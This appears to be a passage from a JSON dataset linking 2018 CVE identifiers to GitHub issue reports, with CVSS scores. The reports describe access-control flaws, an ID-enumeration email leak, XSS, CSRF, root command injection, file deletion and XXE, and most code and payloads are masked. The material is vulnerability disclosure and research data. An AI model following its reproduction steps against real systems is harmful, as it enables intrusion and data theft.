  28088. "description": "There is an incorrect access control flaw in your project. Hello guy, there is an incorrect access control (missing authorization check) flaw in your project. The following is the proof of this flaw. There are two roles in the project, the permission role and the super administrator APITAG. The permission role only has the permission to change the permissions of users, and the super administrator role has all of the permissions, which include permission management, content management and skin management. When we log in with the super administrator role, we can see: FILETAG As the picture shows, the super administrator has three permissions. When we log in with the permission role, we can see: FILETAG As the picture shows, the permission role has only one permission. How does the flaw happen? If the backend controller doesn't check the permission of the role, it causes an incorrect access control flaw. See the code of the cmscontroller; the path of the cmscontroller is: PATHTAG FILETAG Here we can see it uses the Spring framework: the request to PATHTAG is mapped to a function called APITAG that doesn't do a permission check, which causes the incorrect access control flaw. How to prove it? We request the URL \" URLTAG \" directly. FILETAG We can see that the permission role can access the column list page, and it can edit the columns too. FILETAG In the skin management there is an incorrect access control flaw too. We can use the permission role to access the URL \" URLTAG \" FILETAG We can locate the flawed code in PATHTAG FILETAG It maps the request PATHTAG to the function APITAG, which doesn't do a permission check. Advice: FILETAG Before executing the main logic of the function where the controller receives the request from the frontend, please do the permission check (ideally centrally, e.g. in a Spring interceptor or filter, so that no handler can be reached without it). Hope you guys fix this flaw quickly. If you have any questions, please contact me by e-mail: EMAILTAG",
  28089. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  28090. "severity": "HIGH",
  28091. "baseScore": 8.8,
  28092. "impactScore": 5.9,
  28093. "exploitabilityScore": 2.8
  28094. },
  28095. {
  28096. "CVE_ID": "CVE-2018-19114",
  28097. "Issue_Url_old": "https://github.com/lifei6671/mindoc/issues/384",
  28098. "Issue_Url_new": "https://github.com/mindoc-org/mindoc/issues/384",
  28099. "Repo_new": "mindoc-org/mindoc",
  28100. "Issue_Created_At": "2018-11-08T15:00:25Z",
  28101. "description": "Allows an attacker unauthorized access to user accounts. Target: mindoc APITAG. Modify APITAG to APITAG APITAG. After modifying APITAG, you are logged in as admin (the super admin account). Solution: validate APITAG and only allow the characters a-zA-Z NUMBERTAG (alphanumerics). Reference: [astaxie/beego NUMBERTAG URLTAG",
  28102. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  28103. "severity": "HIGH",
  28104. "baseScore": 8.8,
  28105. "impactScore": 5.9,
  28106. "exploitabilityScore": 2.8
  28107. },
  28108. {
  28109. "CVE_ID": "CVE-2018-19121",
  28110. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/85",
  28111. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/85",
  28112. "Repo_new": "mz-automation/libiec61850",
  28113. "Issue_Created_At": "2018-11-08T15:40:58Z",
  28114. "description": "SEGV in function APITAG. I built libiec NUMBERTAG URLTAG on APITAG NUMBERTAG with APITAG ( APITAG before make ). I ran the APITAG in directory APITAG with the command APITAG ; however, there is a SEGV in function APITAG in APITAG when the selected interface is unavailable. Here is the output with ASAN information: ERRORTAG",
  28115. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  28116. "severity": "MEDIUM",
  28117. "baseScore": 4.3,
  28118. "impactScore": 1.4,
  28119. "exploitabilityScore": 2.8
  28120. },
  28121. {
  28122. "CVE_ID": "CVE-2018-19122",
  28123. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/86",
  28124. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/86",
  28125. "Repo_new": "mz-automation/libiec61850",
  28126. "Issue_Created_At": "2018-11-08T15:41:19Z",
  28127. "description": "SEGV in function APITAG. I built libiec NUMBERTAG URLTAG on APITAG NUMBERTAG with APITAG ( APITAG before make ). I ran the APITAG in directory APITAG with the command APITAG ; however, there is a SEGV in function APITAG in APITAG when the selected interface is unavailable. Here is the output with ASAN information: ERRORTAG",
  28128. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  28129. "severity": "MEDIUM",
  28130. "baseScore": 4.3,
  28131. "impactScore": 1.4,
  28132. "exploitabilityScore": 2.8
  28133. },
  28134. {
  28135. "CVE_ID": "CVE-2018-19133",
  28136. "Issue_Url_old": "https://github.com/flarum/core/issues/1628",
  28137. "Issue_Url_new": "https://github.com/flarum/framework/issues/1628",
  28138. "Repo_new": "flarum/framework",
  28139. "Issue_Created_At": "2018-11-08T10:57:36Z",
  28140. "description": "A serious leak: anyone can get every user's email address. Information: Example URL: URLTAG Associated files: PATHTAG PATHTAG Reproduce: Step NUMBERTAG Use an account to log on to this website. Step NUMBERTAG Click URLTAG > Click Change Email > Fill in a different email address and the correct password > Click Save Changes. Step NUMBERTAG This time we can capture a request and a response. Request: FILETAG Response: FILETAG This response contains my own email address. Step NUMBERTAG (the most important step): We can discard the JSON body and modify the user ID contained in the URL. New request: FILETAG After re-sending this request, we get a new response. New response: FILETAG As shown, this response contains the e-mail addresses of other people. Summary: by repeating the last step with other IDs we can download every user's mailbox address and some other information; the endpoint returns the record for whatever user ID the URL names without checking that it belongs to the requesting user (an insecure direct object reference). This is a very dangerous bug. Almost all versions have this flaw. I hope you can repair it as soon as possible.",
  28141. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  28142. "severity": "MEDIUM",
  28143. "baseScore": 5.3,
  28144. "impactScore": 1.4,
  28145. "exploitabilityScore": 3.9
  28146. },
  28147. {
  28148. "CVE_ID": "CVE-2018-19136",
  28149. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/79",
  28150. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/79",
  28151. "Repo_new": "domainmod/domainmod",
  28152. "Issue_Created_At": "2018-11-09T07:57:34Z",
  28153. "description": "Cross-Site Scripting vulnerability in APITAG NUMBERTAG . Multiple XSS vulnerabilities were discovered in domainmod NUMBERTAG . There are two XSS vulnerabilities which allow remote attackers to inject arbitrary web script or HTML: NUMBERTAG URLTAG NUMBERTAG URLTAG",
  28154. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28155. "severity": "MEDIUM",
  28156. "baseScore": 6.1,
  28157. "impactScore": 2.7,
  28158. "exploitabilityScore": 2.8
  28159. },
  28160. {
  28161. "CVE_ID": "CVE-2018-19138",
  28162. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/11",
  28163. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/11",
  28164. "Repo_new": "yanchongchong/swallow",
  28165. "Issue_Created_At": "2018-11-09T04:18:56Z",
  28166. "description": "APITAG CSRF. CODETAG",
  28167. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28168. "severity": "HIGH",
  28169. "baseScore": 8.8,
  28170. "impactScore": 5.9,
  28171. "exploitabilityScore": 2.8
  28172. },
  28173. {
  28174. "CVE_ID": "CVE-2018-19148",
  28175. "Issue_Url_old": "https://github.com/mholt/caddy/issues/2334",
  28176. "Issue_Url_new": "https://github.com/caddyserver/caddy/issues/2334",
  28177. "Repo_new": "caddyserver/caddy",
  28178. "Issue_Created_At": "2018-11-05T07:59:53Z",
  28179. "description": "Problem with the way Caddy serves multiple certificates NUMBERTAG What version of Caddy are you using ( APITAG )? Caddy NUMBERTAG dfb NUMBERTAG Sun No NUMBERTAG UTC NUMBERTAG unofficial NUMBERTAG What are you trying to do? I'm trying to fetch a certificate from my domain APITAG by using the following shell script. CODETAG NUMBERTAG What is your entire Caddyfile? CODETAG NUMBERTAG How did you run Caddy (give the full command and describe the execution environment)? APITAG I'm running Caddy on Debian NUMBERTAG stretch NUMBERTAG Please paste any relevant HTTP request(s) here. N/A NUMBERTAG What did you expect to see? The certificate of APITAG NUMBERTAG What did you see instead (give full error messages and/or log)? The certificate of either app NUMBERTAG app NUMBERTAG or APITAG The certificate changes each time you run the shell script NUMBERTAG How can someone who is starting from scratch reproduce the bug as minimally as possible NUMBERTAG Install Caddy NUMBERTAG Set up three or more subdomains on your own domain NUMBERTAG Copy my Caddyfile and adjust it as needed to fetch a certificate for each subdomain NUMBERTAG Use the provided shell script to fetch the certificate of one of the subdomains. This issue does not affect sites which are not served with Caddy. To verify this, run the same shell script on such a domain and observe that the certificate in the output is the same every time you run it and that it is the correct one for the domain. The practical relevance of this problem is that the remote control software APITAG cannot fetch the correct certificate from a subdomain that is served with Caddy because it receives a different certificate URLTAG each time it tries to fetch it.",
  28180. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
  28181. "severity": "LOW",
  28182. "baseScore": 3.7,
  28183. "impactScore": 1.4,
  28184. "exploitabilityScore": 2.2
  28185. },
  28186. {
  28187. "CVE_ID": "CVE-2018-19148",
  28188. "Issue_Url_old": "https://github.com/mholt/caddy/issues/1303",
  28189. "Issue_Url_new": "https://github.com/caddyserver/caddy/issues/1303",
  28190. "Repo_new": "caddyserver/caddy",
  28191. "Issue_Created_At": "2016-12-19T09:58:02Z",
  28192. "description": "Caddy serves wrong SSL cert for http-only sites NUMBERTAG What version of Caddy are you running ( APITAG )? APITAG NUMBERTAG What are you trying to do? I want to have multiple virtual hosts, some https, some http-only. I want the http-only hosts to not respond to https requests with a wrong certificate NUMBERTAG What is your entire Caddyfile? APITAG NUMBERTAG How did you run Caddy (give the full command and describe the execution environment)? I created the reproducible example from above on my Mac ( APITAG ) but I am having this problem in production on APITAG so I don\u2019t think it is OS related. The working directory contains the Caddyfile from above. APITAG NUMBERTAG What did you expect to see? Caddy starts fine and serves both vhosts, one with https and the other with http. I expect Caddy to not respond at all when I try to access APITAG , as that virtual host is explicitly configured as http, not https NUMBERTAG What did you see instead (give full error messages and/or log)? When accessing APITAG (the host which is explicitly http), Caddy sends the cert for APITAG , which results in an SSL error. (I know that in this example it always results in an error because the cert is self-signed, but in production this would serve a trusted cert from Let\u2019s Encrypt.) When ignoring the warning, Caddy responds with APITAG . While this is technically correct, Caddy should not accept the connection in the first place. In addition to the SSL error, this also leaks information about at least one other site (the one Caddy takes the certificate from) that is set up on the host NUMBERTAG How can someone who is starting from scratch reproduce this behavior as minimally as possible NUMBERTAG Use the Caddyfile from step NUMBERTAG Update the root directive so that Caddy finds some files to serve NUMBERTAG Edit your APITAG to include the following NUMBERTAG Start Caddy as described in step NUMBERTAG APITAG Thanks so much for any responses. I\u2019m sorry if there is already an issue for this or if this is a known bug, I couldn\u2019t find anything related to this.",
  28193. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
  28194. "severity": "LOW",
  28195. "baseScore": 3.7,
  28196. "impactScore": 1.4,
  28197. "exploitabilityScore": 2.2
  28198. },
  28199. {
  28200. "CVE_ID": "CVE-2018-19168",
  28201. "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/250",
  28202. "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/250",
  28203. "Repo_new": "xtr4nge/fruitywifi",
  28204. "Issue_Created_At": "2018-11-10T21:41:51Z",
  28205. "description": "Unauthenticated remote code execution as root. APITAG contains two security vulnerabilities that allow an unauthenticated attacker to take complete control over the system. The first vulnerability has already been released by another researcher and was assigned APITAG : > APITAG (aka APITAG NUMBERTAG allows remote attackers to execute arbitrary commands via shell metacharacters in the io_mode, ap_mode, io_action, io_in_iface, io_in_set, io_in_ip, io_in_mask, io_in_gw, io_out_iface, io_out_set, io_out_mask, io_out_gw, iface, or domain parameter to PATHTAG or the APITAG hostapd_secure, hostapd_wpa_passphrase, or supplicant_ssid parameter to FILETAG . To exploit that vulnerability an attacker needs a valid session, but it turns out that command injection is also possible in a file that lacks any access control. The file APITAG is accessible to anyone (erroneously?) and the validation attempt in APITAG can be bypassed. So a POST request to APITAG with an APITAG value of APITAG will execute APITAG as root, without any authentication. Even if the regex used in APITAG were correct it would still be too lenient (because it allows APITAG and spaces); the parameter should be validated against a strict allow-list, or better, never passed to a shell at all.",
  28206. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28207. "severity": "CRITICAL",
  28208. "baseScore": 9.8,
  28209. "impactScore": 5.9,
  28210. "exploitabilityScore": 3.9
  28211. },
  28212. {
  28213. "CVE_ID": "CVE-2018-19170",
  28214. "Issue_Url_old": "https://github.com/JpressProjects/jpress/issues/89",
  28215. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/89",
  28216. "Repo_new": "jpressprojects/jpress",
  28217. "Issue_Created_At": "2018-11-08T11:38:08Z",
  28218. "description": "There is a stored XSS via PATHTAG . Hello, my nickname is isecream. I found three stored XSS in the form. First, access the page FILETAG FILETAG then use the payload: \"> APITAG FILETAG When I submit: FILETAG FILETAG FILETAG",
  28219. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  28220. "severity": "MEDIUM",
  28221. "baseScore": 4.8,
  28222. "impactScore": 2.7,
  28223. "exploitabilityScore": 1.7
  28224. },
  28225. {
  28226. "CVE_ID": "CVE-2018-19178",
  28227. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/6",
  28228. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/6",
  28229. "Repo_new": "zchuanzhao/jeesns",
  28230. "Issue_Created_At": "2018-11-09T04:05:00Z",
  28231. "description": "The APITAG filter is APITAG, which leads to stored XSS vulnerabilities. NUMBERTAG Vulnerability analysis. Code: PATHTAG It can be seen that the parameter filtering is not done properly. package APITAG import APITAG import APITAG import APITAG / XSS\u653b\u51fb\u5904\u7406 (XSS attack handling) Created by zchuanzhao on PATHTAG / public class APITAG extends APITAG { public APITAG APITAG { APITAG } MENTIONTAG public String FILETAG Triggering the stored XSS vulnerability: FILETAG Likewise, enter the content in the comments section of the post: APITAG FILETAG The APITAG filter is APITAG, which leads to stored XSS vulnerabilities FILETAG NUMBERTAG Bug fix NUMBERTAG Encoding unification: use one encoding (UTF NUMBERTAG is recommended) across every data layer of the site; inconsistent encoding between layers can let some filtering models be bypassed. NUMBERTAG HttpOnly cookies: the goal of many XSS attacks is to obtain the user's cookie. Marking the important cookies HttpOnly means the browser still sends them with requests to the server, but they cannot be accessed from script, so an XSS payload cannot read them via JavaScript's APITAG. NUMBERTAG Input length control: limit untrusted input to a reasonable length; this cannot completely prevent XSS, but it raises the difficulty of an attack. NUMBERTAG Input checking: check whether the data entered by the user contains special characters such as <, >, ', \", etc., and filter or encode them if found. Note that input filtering alone is a weak defence; the primary fix is contextual output encoding wherever user content is rendered.",
  28232. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  28233. "severity": "MEDIUM",
  28234. "baseScore": 5.4,
  28235. "impactScore": 2.7,
  28236. "exploitabilityScore": 2.3
  28237. },
  28238. {
  28239. "CVE_ID": "CVE-2018-19180",
  28240. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/1",
  28241. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/1",
  28242. "Repo_new": "doublefast/yunucms",
  28243. "Issue_Created_At": "2018-11-09T06:58:06Z",
  28244. "description": "Arbitrary file deletion & launching a new installation process to execute PHP code. Two issues were discovered in yunucms NUMBERTAG : APITAG File Deletion; APITAG a new installation process to execute PHP code. APITAG is an arbitrary file deletion vulnerability which allows remote attackers to unlink any file. The code section which makes this vulnerability possible is found in the PATHTAG file, line NUMBERTAG : ERRORTAG In the APITAG function shown above, the file named by the content of $_POST FILETAG APITAG is removed without any validation of the path. APITAG a new installation process to execute PHP code: after removing APITAG (presumably the install lock), remote attackers can launch a new installation process. The code section which makes this vulnerability possible is found in the PATHTAG file, line NUMBERTAG : CODETAG Follow the function APITAG in the PATHTAG file, line NUMBERTAG : ERRORTAG It uses file_put_contents to write $arr into APITAG, apparently without escaping, so PHP code supplied through the installer form ends up in that file. PoC: in installation step setup2, we can input APITAG into the \u6570\u636e\u8868\u524d\u7f00 (table prefix) DB_PREFIX field FILETAG When the installation process finishes, we get FILETAG like this: FILETAG Visiting the homepage URLTAG creates the file PATHTAG FILETAG",
  28245. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28246. "severity": "CRITICAL",
  28247. "baseScore": 9.8,
  28248. "impactScore": 5.9,
  28249. "exploitabilityScore": 3.9
  28250. },
  28251. {
  28252. "CVE_ID": "CVE-2018-19182",
  28253. "Issue_Url_old": "https://github.com/engelsystem/engelsystem/issues/494",
  28254. "Issue_Url_new": "https://github.com/engelsystem/engelsystem/issues/494",
  28255. "Repo_new": "engelsystem/engelsystem",
  28256. "Issue_Created_At": "2018-11-11T12:45:04Z",
  28257. "description": "Security Vulnerability. Hi, I found a security vulnerability in engelsystem. How shall I provide more details? Best Regards mschop",
  28258. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28259. "severity": "HIGH",
  28260. "baseScore": 8.8,
  28261. "impactScore": 5.9,
  28262. "exploitabilityScore": 2.8
  28263. },
  28264. {
  28265. "CVE_ID": "CVE-2018-19183",
  28266. "Issue_Url_old": "https://github.com/ethereumjs/ethereumjs-vm/issues/386",
  28267. "Issue_Url_new": "https://github.com/ethereumjs/ethereumjs-monorepo/issues/386",
  28268. "Repo_new": "ethereumjs/ethereumjs-monorepo",
  28269. "Issue_Created_At": "2018-11-10T01:55:10Z",
  28270. "description": "Unexpected runcode failure. I am using the ethereumjs-vm ERRORTAG function to run my contract bytecode, and I use the step event for trace output. When I set the runcode attribute APITAG and tried to run it, I got the output of a REVERT opcode, which means runcode failed. REVERT output: APITAG",
  28271. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  28272. "severity": "HIGH",
  28273. "baseScore": 7.5,
  28274. "impactScore": 3.6,
  28275. "exploitabilityScore": 3.9
  28276. },
  28277. {
  28278. "CVE_ID": "CVE-2018-19184",
  28279. "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/18069",
  28280. "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/18069",
  28281. "Repo_new": "ethereum/go-ethereum",
  28282. "Issue_Created_At": "2018-11-10T04:34:36Z",
  28283. "description": "Runtime error: invalid memory address or nil pointer dereference, and a SEGV signal occurred, when we use APITAG to run the bytecode. ERRORTAG The bytecode is: ERRORTAG",
  28284. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  28285. "severity": "HIGH",
  28286. "baseScore": 7.5,
  28287. "impactScore": 3.6,
  28288. "exploitabilityScore": 3.9
  28289. },
  28290. {
  28291. "CVE_ID": "CVE-2018-19185",
  28292. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/87",
  28293. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/87",
  28294. "Repo_new": "mz-automation/libiec61850",
  28295. "Issue_Created_At": "2018-11-11T13:49:41Z",
  28296. "description": "Another heap buffer overflow in function APITAG. This issue seems to be similar to NUMBERTAG, which was reported several days ago. Although that bug has been fixed, there is another specific APITAG sequence which can cause a heap buffer overflow on a different path. The following is the special sequence; the complete version of APITAG that triggers the heap buffer overflow is FILETAG . CODETAG Here is the ASAN information: ERRORTAG",
  28297. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28298. "severity": "CRITICAL",
  28299. "baseScore": 9.8,
  28300. "impactScore": 5.9,
  28301. "exploitabilityScore": 3.9
  28302. },
  28303. {
  28304. "CVE_ID": "CVE-2018-19188",
  28305. "Issue_Url_old": "https://github.com/payfort/payfort-php-sdk/issues/12",
  28306. "Issue_Url_new": "https://github.com/payfort/payfort-php-sdk/issues/12",
  28307. "Repo_new": "payfort/payfort-php-sdk",
  28308. "Issue_Created_At": "2017-02-23T06:44:59Z",
  28309. "description": "A reflected XSS vulnerability in this SDK. Hello: I found a reflected XSS vulnerability in this SDK. The vulnerability exists due to insufficient filtering of user-supplied data in the 'fort_id' HTTP $_REQUEST parameter, which is passed to \u201cpayfort php sdk APITAG. The affected source code is at line NUMBERTAG ; there is no protection on $_REQUEST FILETAG So if an attacker constructs a special URL as follows and sends it to a victim, when the victim clicks the URL, the code contained in the URL is executed in the victim's browser to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The following screenshot is the result of clicking the above URL ( win7 sp NUMBERTAG firefox NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech. Email: EMAILTAG",
  28310. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28311. "severity": "MEDIUM",
  28312. "baseScore": 6.1,
  28313. "impactScore": 2.7,
  28314. "exploitabilityScore": 2.8
  28315. },
  28316. {
  28317. "CVE_ID": "CVE-2018-19277",
  28318. "Issue_Url_old": "https://github.com/PHPOffice/PhpSpreadsheet/issues/771",
  28319. "Issue_Url_new": "https://github.com/phpoffice/phpspreadsheet/issues/771",
  28320. "Repo_new": "phpoffice/phpspreadsheet",
  28321. "Issue_Created_At": "2018-11-12T20:44:26Z",
  28322. "description": "XXE injection: security scan bypass. This is: CODETAG What is the expected behavior? The APITAG function is used to prevent XXE attacks. What is the current behavior? The APITAG function can be bypassed by using UTF NUMBERTAG encoding, so a document containing an external entity is still parsed. (The robust fix is to disable external entity loading in the XML parser itself rather than to scan the document text for entity declarations.) What are the steps to reproduce? Replace the IP address and port APITAG with something you control. CODETAG FILETAG Replace APITAG in your xlsx file with the one above and re-zip the Excel sheet. I've attached an xlsx file that makes a request as configured above. File: FILETAG Set up a listener (Python, netcat, etc.) locally and watch for a request that will be made once the xlsx is read by the library. Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue. Which versions of APITAG and PHP are affected? I believe it affects all versions.",
  28323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28324. "severity": "HIGH",
  28325. "baseScore": 8.8,
  28326. "impactScore": 5.9,
  28327. "exploitabilityScore": 2.8
  28328. },
  28329. {
  28330. "CVE_ID": "CVE-2018-19277",
  28331. "Issue_Url_old": "https://github.com/MewesK/TwigSpreadsheetBundle/issues/18",
  28332. "Issue_Url_new": "https://github.com/mewesk/twigspreadsheetbundle/issues/18",
  28333. "Repo_new": "mewesk/twigspreadsheetbundle",
  28334. "Issue_Created_At": "2018-11-22T17:23:13Z",
  28335. "description": "Update phpoffice/phpspreadsheet. It is necessary to update phpoffice/phpspreadsheet because of CVETAG . See URLTAG Any plans to release an updated version of this bundle soon?",
  28336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28337. "severity": "HIGH",
  28338. "baseScore": 8.8,
  28339. "impactScore": 5.9,
  28340. "exploitabilityScore": 2.8
  28341. },
  28342. {
  28343. "CVE_ID": "CVE-2018-19289",
  28344. "Issue_Url_old": "https://github.com/xCss/Valine/issues/127",
  28345. "Issue_Url_new": "https://github.com/xcss/valine/issues/127",
  28346. "Repo_new": "xcss/valine",
  28347. "Issue_Created_At": "2018-11-14T17:13:13Z",
  28348. "description": "In the latest version there is an HTML injection which, combined with JavaScript execution in PDF, leads to a URL redirect vulnerability. In the latest version there is an HTML injection which, combined with JavaScript execution in PDF, leads to a URL redirect vulnerability NUMBERTAG HTML injection FILETAG FILETAG",
  28349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28350. "severity": "MEDIUM",
  28351. "baseScore": 6.1,
  28352. "impactScore": 2.7,
  28353. "exploitabilityScore": 2.8
  28354. },
  28355. {
  28356. "CVE_ID": "CVE-2018-19291",
  28357. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/60",
  28358. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/60",
  28359. "Repo_new": "chekun/dilicms",
  28360. "Issue_Created_At": "2018-11-11T18:15:37Z",
  28361. "description": "There are two CSRF vulnerabilities that can delete a user or a user group. Software link: URLTAG After the administrator has logged in, open the page FILETAG Delete-user PoC: APITAG FILETAG Delete-group PoC: APITAG",
  28362. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  28363. "severity": "MEDIUM",
  28364. "baseScore": 6.5,
  28365. "impactScore": 3.6,
  28366. "exploitabilityScore": 2.8
  28367. },
  28368. {
  28369. "CVE_ID": "CVE-2018-19329",
  28370. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/113",
  28371. "Issue_Url_new": "https://github.com/greencms/greencms/issues/113",
  28372. "Repo_new": "greencms/greencms",
  28373. "Issue_Created_At": "2018-11-17T06:38:06Z",
  28374. "description": "There is a vulnerability that can delete an arbitrary file. After the administrator has logged in, open the following link URLTAG Click the delete button; we get a link like this: URLTAG The string APITAG is base NUMBERTAG encoded, so we can decode it; the decoded string is PATHTAG. So we can encode a string like this, PATHTAG, and build the link URLTAG When we visit this link, the FILETAG file is deleted: the decoded path is used as given, with no restriction to the intended directory.",
  28375. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  28376. "severity": "MEDIUM",
  28377. "baseScore": 4.9,
  28378. "impactScore": 3.6,
  28379. "exploitabilityScore": 1.2
  28380. },
  28381. {
  28382. "CVE_ID": "CVE-2018-19353",
  28383. "Issue_Url_old": "https://github.com/ansilove/libansilove/issues/4",
  28384. "Issue_Url_new": "https://github.com/ansilove/libansilove/issues/4",
  28385. "Repo_new": "ansilove/libansilove",
  28386. "Issue_Created_At": "2018-11-18T08:25:22Z",
  28387. "description": "A segmentation fault. As the picture shows FILETAG, when libansilove parses a crafted file it performs an out-of-bounds read if APITAG is assigned wrongly; as valgrind detects, there is a APITAG read\" (the valgrind trace below shows two problems: an invalid read of already-freed memory in main, and a read of an unmapped address in strtonum called from ansilove_ansi, which is what produces the SIGSEGV). PATHTAG valgrind ./ansilove -i poc.ans NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with -h for copyright info NUMBERTAG Command: ./ansilove -i poc.ans NUMBERTAG APITAG NUMBERTAG ANSI / ASCII art to PNG converter Copyright (c NUMBERTAG Stefan Vogt, Brian Cassidy, and Frederic Cambus NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F NUMBERTAG strcmp_sse2_unaligned (strcmp sse2 APITAG NUMBERTAG by NUMBERTAG C0: main APITAG NUMBERTAG Address NUMBERTAG a NUMBERTAG b0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2EDEB: free (in PATHTAG NUMBERTAG by NUMBERTAG E6: APITAG APITAG NUMBERTAG by NUMBERTAG E6: APITAG APITAG NUMBERTAG by NUMBERTAG F: main APITAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG F: main APITAG NUMBERTAG Input File: poc.ans Output File: FILETAG NUMBERTAG Conditional jump or move depends on uninitialised value(s NUMBERTAG at NUMBERTAG E3D5B4: ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG strtol_l_internal APITAG NUMBERTAG by NUMBERTAG D0F: strtonum APITAG NUMBERTAG by NUMBERTAG E3D NUMBERTAG ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEGV): dumping core NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG strtol_l_internal APITAG NUMBERTAG by NUMBERTAG D0F: strtonum APITAG NUMBERTAG by NUMBERTAG E3D NUMBERTAG ansilove_ansi (in PATHTAG NUMBERTAG by NUMBERTAG A2: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the --main-stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with --leak-check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG Use --track-origins=yes to see where uninitialised values come from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault FILETAG",
  28388. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28389. "severity": "MEDIUM",
  28390. "baseScore": 6.5,
  28391. "impactScore": 3.6,
  28392. "exploitabilityScore": 2.8
  28393. },
  28394. {
  28395. "CVE_ID": "CVE-2018-19360",
  28396. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2186",
